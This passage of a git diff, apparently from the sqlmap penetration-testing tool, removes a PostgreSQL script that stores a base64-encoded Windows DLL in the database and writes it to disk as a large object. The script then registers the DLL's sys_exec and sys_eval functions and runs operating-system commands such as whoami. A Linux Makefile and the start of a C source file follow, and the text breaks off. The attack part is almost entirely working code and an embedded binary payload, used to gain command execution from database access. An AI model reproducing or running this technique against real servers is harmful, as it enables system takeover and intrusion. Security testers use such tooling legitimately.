-UPDATE udftest SET data=data||'hFnZThYGwffYG8D32FlIXX/p221WuLwYvgRXUDvGcw+LB/QOGh1TAlDNO/5y8SnkOawwJSAg7RsxEz9lMQi4TVoql39X+mY5AXQEVGRBPAPBgThQRXXviRv8+zPSuQsBHEgYD5Tfwl1+35qGLT/ZSDHID7dBDbbbEjhWBXEGM1f4b43G0ggYDXbgnBwMO/nab/D/cgmLWAgD2Tv7cgpCvCg71nLoag+H7JnbTk9q/p9w8wUcm2i1ZA7+UIPsCN1wawwlMWIzxWzwZKMLn6H0GoksSAloS/CuMzEGbMwS61WXNMvDvi0TUBkIDAg7QbjwWxskwegf9wvgAYW77dQKA08ZAFmUi+Xr2E5qlpkByj2lwPqyFuwUmS+7MSNjJ7EzPAVARPlxSSNMpRKsEOw7uQ5jCWEQxab7CwOPWe9W+TbLNttSkGwDjSvg+lgDzZn88Tyq/Ipgk2Agcw3DlQ4O42yWUUoUdT50uxnaaQH2BCAUCopW7PdYGFij7BBofjQH/8j4U1e/TuZAu3pmU6HEHXgNhcMnNZBiUmvxBOtg+3hfC8VaW4F1mJILh/DmyiBjBzQInSf9re1oGPQzDBE793UHvk8IfBffWesLhfN1o8HgEAvwxCOUPvYA99YHBF5fW7Y/mCMjI2MFnFhcYAKyIyNoVAAAlAp5AAIFALPsPmqpwRQRIwNkaAZpugNAAXJI/36JMn1REhBLUlNEU/9///9ie5Q0/rQnQb7gu040vsrDF0M6XERvY3VtZW50/9v//3MgYW5kIFNldHRpbmdzXEFkbQdpc3RyYXRvci63t/b/VzJLM1NURU5VUERBBjNlc2sWcFzt/9/+c2hhcmVcdiZ1YWxfY3BwX3Byb2plY3Q+2/+2/GxpYl9wb2cfc3FsdWRmX3N5FVLDfoH9ZWxlYXNlHS5wZGLRfC8WyLUZlwfQYF0lmw/HhQdOyWHdUQNlJ8wHYXQn7MAP2B8I6wP/IAABSfBBqSDKIiIBZt8NsRm/RP8Ag1EGjKpgApIYBVBU';
-UPDATE udftest SET data=data||'gC0oFP8vzxR4EAFHZXRDdXJyZW50//+R/1Byb2Nlc3NJZFN5c3RlbVRpbWVBc0ZpbGWt/RZ7CRgIY2tDb3UvDYu1v/1RdWVyeVADZm9ybWFuPBYO/Vv3WxhEaXNhYjNoV2FkTGlicmFW/m+/J0NhbGxzb0lzRGVidWdnZXJt2/ayuXZUU1VuaEBkMWRhMffbRXhGcHRpb25zShmgbSlbuRJUF99kbQlEYR4RSZBsc9utbQxrQJ1tcIdlR1GEteaaf3dVUSLCbNmyG1zEFXd7moUzhTxfY2l0NG3fDVhtCl80X2Ftc2cIeO9+4a8RC2RqdUJfZmRpdg1fQ3BwQPvD2lhjv7xfZGVjbwNtYcISlGkyXW0e1t4ruHkYQosy9QlMFizYbk0TD2Xt9gkjDV8bcjRfTG1tHGbX/n0YbldkX251PURtYdzCxrZjHnI0bnPY3Qzb9h0IZvJ0LK5ybrnbO4yEc/zdKnBlVeYK7ZtFD2MHtDA6twnOve9WyM6Lb29D+9ZitiJWbl90eTkctlBoDRqJFYpfcnuahS0KbEaRpHBFuODePXBnQ3RvYXNLunVt///PAlYQMBgJHxYjKgsXJBEXEQeCBgb2////FwkHBRYMHggKCxYJGBgVBQYbBQwQBgcXBiEFEQ++/2//BhQhEQsIKyIFBw0RHQ0YUy1IOAYAB9u+XU4IDAkzCgkLDFsFFr/922UWDgs0FQsYFg09BUK4BRIeFGub/90GaTIRDA4dTQUXIw0MJAgkAFPB/x/wJgY0BGAE6AgEHBwEAFL5D6t/TAEFAPohg0k04AACIQsBCcDsN2kMWwCQFQsz971HGgkLAt4e36X5ZgcDYATbzx5Ae7bsvQEqAgcGcCYHs33LZriMIlAUQE+wNdubMgBQn3fQHGWxA1nVGCFCAJsfSLovsC50ZXh0mgoestlgkAy3QmAucgmD3BrLYfsoBwgTfa85bAJALib+A23KTtOUMAInwE/7XrDGc3KA67BzGk9ujkYAUqlPjAFvSgZpUB5C';
-UPDATE udftest SET data=data||'GwDgk9uMIxKhUlMAAAAAAAAAAACQ/wAAAAAAAAAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOmnmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAAD5IYNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAgBAAABAQAACQEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
--- DLL compiled using PostgreSQL 8.2 C libraries
--- INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMAUx6DSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCXeP6gEDsfuvE1UAABwLAAAAIAAAJgAAXkB2Sf64AAAQ+MPMDxEM+9/+f1NVi2wkDItFEFZXUOgbAgKL2Iszgeb/AN1/938/g+4EjU4BUf8VQoxWjVMEi/hSVyMK/7GP/bBXxgQ3ABeEV4vwCJSDxBw7XRB0W/Zv3wlTRQgNBF+Lxl5dW2p/bfllLxDDEoHsCAShAu2zdf8gADPEiYQkBA2LBgxAEJ2F3d5kli2FgYs3nLIdefvVVoPHmNhXU2oBmTO3sdvu1WhlFFOaM/+ciCBTjdvYd+1UJDgWVlKJXCQ8FnylLLf///+FwHRbjUQkFI1QAesDjUkAighAhMl1+SvCMo0sfbeNtTt+KHhJUyQgUAP+V9iT7o8QgItMJCRRUiyL/VDY2fZyIHWvi2EQsFMXXzh8w5AOgD4AdAQ3FsZEN/+u/bK7AHCNZCRvg8AEULjggbnyucYsHKQAH/Ync+2JBxwZElCNRwRWUPjNF1w7i4ydiHYMi8dfM+7C4YfMNQ6BxF1u/yWF3/7hsagFpDsNbHUC88PpCAXLi/8QK2PuVmiAaOhw8f7/u7zHWVmjI1gEVIX2dQUzwEBew4MmAF3h6+5WB5loBMMJgnulBhuttbHVC1kjIk5Q7FfY/dtRUQo5RQx1DjkFaxB+bnMtNO7+EIN9DAGLCRBIiybYiWG3dd8KI0gPhdR9ZBcYBot5y7W72241ICiJ';
--- UPDATE udftest SET data=data||'PVC7HlDrGEoLD/bfpwSOO8d0F2joA6gsagDy/3fd9obWbOfrB8csATyhL0xqAm/37oZe0glqH5IJRus8qhDABHXte++4xwUfKBpA4CcH79/3nVyLILQEsBs6WYk1K/tztxs9WTmydQhpczA5PRXS3+69XHQcaAYoCHxDDf91PL7Y9rYDCCMW//FUiH+suRkB3AgBodt4BINl/ACZyM5m39sP1Pxjg7Ung/gCZtJZW//NsI19oFhLUDFZLjXmaN/hD4SHxxlUE0kU8e2luxgQiX2N7wQ7yHJRgz/b2j+2g/NqbDkHdOn/NyYg+BDabKExXLn4VhVxx+3NRBtHTfhVOU0Q27b2rQPQCHS0iQkCDBoIYGN20nbrp/YM/VlELttXiBE4WAZMMvwbjiALP1BDm1u/9Db8ycIMAGoQQxIo0Fv5i/KLXbK7vbkIHFTkM8lc/Il9IAhbi7Hw/DvxWjk6RBfk4c3/H6+EO/B0BYP+AnUuoew7wXSeFm64bVZf0Dte5AADkz24D2cR/mwUFoBWw7+TEglSJ/4BdSRkIFrEZoWzE1d3L1L+Gu010gYRU/dqA3VDYc92w080AyFodC4sLVx42CV/6xtx7IsXCXCpfLyq4FBRZEwQZei5Gg6t9i/60v67tcdv2xkFnSrkIb3DluyvcJrUFv87JGobd7cKjvZUfUhVDA0EklnKBWKGXTgiMygDbt5MG18hIEMFHIkVGIkd+25ubhSJNRCJPQxmjBg4BmZplmYNLB0IBe9uaZYEJQAtf/ycjxT5s421MJVWJAcEKI1FCLMx1v40i4Xg/KCqcJUBbR3btRwZICQTGAllwLm7ZowJHLNgiYXYMr4xzPIKBNwDFDRodMZfBaa0jFlq9xjWvs/geUYcgz0gAPkjrEDsHWhbG34G8cJ7eiTJw4BAHhTDahQLKSnySlAVqvj8/pMeopwQZFnrZ2oIN6RZQ3LDOI/tJzXDrdC6WTTg9b8D5FB/bSNgvkt0Zp4c3CpbjK0ULNbiCeDlJbRXG9I6';
--- UPDATE udftest SET data=data||'2wd53IRnk9xsmFnZTttt/u8WBt332BvA99hZSF1WuLwYvgQaHX/pV1A7xnMPiwdTAlA5rPQO1jv+cvEwJSALEinkIE9pDd6+ETUIuE1aLmY5AXP/8u9KWGhBPAPBgThQRXXvM9K5CwEbdoN/HEgYD5Tnwl07PyW+NS3dSDHID7dBRaVLbLdWBXEGM1cACBgR/98ajXbkoBwMO/lyCYtYCAPZO/sztd/gcgpCnCg71nLoat9ONh8O2U9q/qNwaNVkGOYbOBICUIPsCCnpu+HWMWYzxXDwZKMaiTAMFj5DTAloT/BwfV1nYuwS71WXLRNQt2iWhxkILAg7KyTBFYJw4egf9w/gAYkD1HbbqU8dAFmUi+WWKdaxnZ0Byj2pwPqdYmUt2C+7MUZGxk43PAVAREzG8uOSqRKwEOwJZbN2ch0Qyar776UWBh5a/T6UM5dttmwDjSvg+vzxQLAGmjyu/IrZwCbBdw3DlZYzHBzGUU4Ued6xfOh2aQISBCAUCqoYka3Y71yj7BBogvg7aA7+U1e/TuZAu35mfA2F6KdCicMrNZQE62C2xKRW43hjEXWYxhaKtZILl/AHNNHMlUEInSe++1vbOPQzDBE793UHvk9Z6wuF83XsEfgup8HgEAvwyAD31gfGRih9BF5fW7o/mAWcRkZGRlhcYGgAAGRHVAAA1CgV8gIhAI10Z9l9pRQRIgNkA0Bl0AzSAXJIXf///RJREhBLUlNEUwG3/T9I581Otf//N//blFHkL74MDGM6XERvY3VtZW50cyBhbmQgU2X//9v/dHRpbmdzXEFkbQdpc3RyYXRvci5XMkszU1RFTv63t/ZVUERBBjNlc2sWcFxzaGFyZVx2/O3/3yZ1YWxfY3BwX3Byb2plY3Q+bGliX3Bv/f//tmcfc3FsdWRmX3N5c184MlxSZWxlYXNlIMd+gSAucGRi0dUZbPK9WHcH0A91g3WVq6EHbQOBAzslhyfMB30PJNGdsNgfCQsDH9AogwAAAn0DpaLtsRm/RP+q';
--- UPDATE udftest SET data=data||'iiSCAIAAAGAw/woqwEIU//+XZ3gQAUdldEN1cnJlbnRQcm9jZXNzvf//yElkU3lzdGVtVGltZUFzRmlsZQn+1n6LGAhja0NvdS8NUXVlcnlQrcXa3wNmb3JtYW48Fg4Y3/6t+0Rpc2FiM2hXYWRMaWJyYSdDYWxsXCv/t3NvSXNEZWJ1Z2dlcm127W172VRTVW5oQGQxZEV4Rq2wmPtwdGlvbnNKGQTQtpS5ElQXtm+ytkRhHhFJkGwMa8257dZAnW1wh2VHUX9Zwlpzd1VRIhtCYbZsXMQVM6y7Pc2FPF9jaXQ0bQrXtu8GXzRfYW1zZwh4EQvtd7/wZGp1Ql9mZGl2DV9DcHBYY78JoP1hvF9kZWNvA5HctjBhaTJdbR55GGxr7xVCizL1CW5NESYLFhMPZQ2+dvuEXxtyNF9MbW0cGG5bs2v/V2RfbnU9RG1hYx5ye25hYzRuc9gdCMZuhm1m8nQsrnJuhHPN3O0d/N0qcGVVRV5zhfYPYwe0MDrvsdsE51bIzotvb7aGoX1rIlZuX3R5ORwaFlsotIkVil9yCp49zcJsRpGkcEVwZwFccO9DdG9hc0u6dW3///9nVhAzGAksFiMtCxcpERcRB4YGBhcJBwUWDB5/+///CAoLFgkYGBUFBhsFDBAGBxcGIQURDwYUIRELCCff/7crIgUHDREdDRhTLUg4BgAHCLJt3y4MCTMKCQsMWwUWFu7f/u0OCzQVCxgWDT0FQrwFEh4UBmky2d7N/xEMDh1NBRcjDQwkCAtEAvBvKvh/NARgBOgIBBwcBAAyTAEFAC3/YfVTHoNJNOAAAiELAQkMCJj9JlsArBULbOa+9xoJCwLeHgf3uzTfA2AEc4IeQAEqbM+WvQIHBnAmB7hmtm/ZjCJQFEBPsACrZntTUJ930BzVtyx2IBghQgAvbPMDSbAudGV4dLoKkMNDNhsMt0JgLnLLLWGQW2H7KAcIE7rvNYcCQC4m/gOUMLhN2WkCJ8BPc3Jg3wvWgOuwcxpPzc3RCFKp';
--- UPDATE udftest SET data=data||'T4wBUPtNySAeQhuMIxIAAHxyoVJTAAASAAAA/wAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnDmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAABTHoNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAkBAAABAQAACgEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
-
--- Create a new OID for a large object, it implicitly adds an entry in the
--- PostgreSQL large objects system table
--- 
--- References:
--- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
--- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
--- Update the PostgreSQL system large objects table assigning to the just
--- created OID the binary (base64 decoded) UDF as data
--- 
--- Refereces:
--- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
--- Export the binary UDF OID to a file on the file system
--- 
--- Any folder where postgres user has read/write/execute access is valid
--- SELECT lo_export(35817, E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll');
--- 
--- Notes:
--- If the library file already exists, the user postgres does not have
--- access to overwrite it
--- The following enumerates the PostgreSQL data directory
--- SELECT CURRENT_SETTING('data_directory')
--- Reference:
--- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
--- The following will save into C:\Program Files\PostgreSQL\8.3\data
-SELECT lo_export(35817, 'lib_postgresqludf_sys.dll'); -- Favourite one, no need to enumerate the PostgreSQL data directory before
--- The following will save into nowhere
--- SELECT lo_export(35817, E'\lib_postgresqludf_sys.dll');
--- The following would save into C:\ (Permission denied)
--- SELECT lo_export(35817, E'\\lib_postgresqludf_sys.dll');
-
-
--- Create two functions from the binary UDF file
--- CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
--- CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
--- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_postgresqludf_sys.txt'); -- %TEMP% path is C:\Documents and Settings\postgres\Local Settings\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%\\lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);

extra/postgresqludfsys/lib_postgresqludf_sys/linux/Makefile

@@ -1,11 +0,0 @@
-LIBDIR=/tmp
-
-8.2:
-	gcc -Wall -I/usr/include/postgresql/8.2/server -O1 -shared src/8.2/lib_postgresqludf_sys.c -o so/8.2/lib_postgresqludf_sys.so
-	strip -sx so/8.2/lib_postgresqludf_sys.so
-	cp -f so/8.2/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc -Wall -I/usr/include/postgresql/8.3/server -O1 -shared src/8.3/lib_postgresqludf_sys.c -o so/8.3/lib_postgresqludf_sys.so
-	strip -sx so/8.3/lib_postgresqludf_sys.so
-	cp -f so/8.3/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.2/lib_postgresqludf_sys.c

@@ -1,111 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
